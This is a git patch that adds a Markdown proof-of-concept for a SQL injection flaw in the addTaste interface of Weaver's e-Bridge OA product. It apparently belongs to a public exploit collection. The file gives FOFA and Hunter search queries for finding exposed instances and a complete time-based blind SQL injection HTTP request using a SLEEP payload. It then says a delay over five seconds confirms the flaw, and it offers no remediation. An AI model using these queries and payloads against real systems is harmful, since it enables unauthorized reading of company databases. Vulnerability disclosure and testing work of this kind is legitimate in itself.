From b2534a54e9520d661990f9dc916c0a1bae4ab9b9 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 14 Dec 2023 12:58:28 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AE=E4=BA=91=E6=A1=A5?=
 =?UTF-8?q?=20e-Bridge=20addTaste=E6=8E=A5=E5=8F=A3SQL=E6=B3=A8=E5=85=A5?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md | 27 ++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md

diff --git a/泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md b/泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md
new file mode 100644
index 0000000..94283b3
--- /dev/null
+++ b/泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md	
@@ -0,0 +1,27 @@
+## 泛微云桥 e-Bridge addTaste接口SQL注入漏洞
+
+e-Bridge 提供了一套全面的办公自动化工具，包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化，并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞，通过此漏洞攻击者可获取企业数据库敏感数据。
+
+
+## fofa
+```
+app="泛微-云桥e-Bridge"
+```
+## hunter
+```
+app.name="泛微云桥 e-Bridge OA"
+```
+
+## poc
+```
+GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+Accept: */*
+Cookie: EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18; sl-session=BmCjG8ZweGWzoSGpQ1QgQg==; EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10
+Accept-Encoding: gzip
+SL-CE-SUID: 25
+```
+延迟时间大于5秒
+
+![0369e1c147602f35b76105a4f2aebd91](https://github.com/wy876/POC/assets/139549762/0aee421c-131e-4a03-b2d9-c046abdb27f2)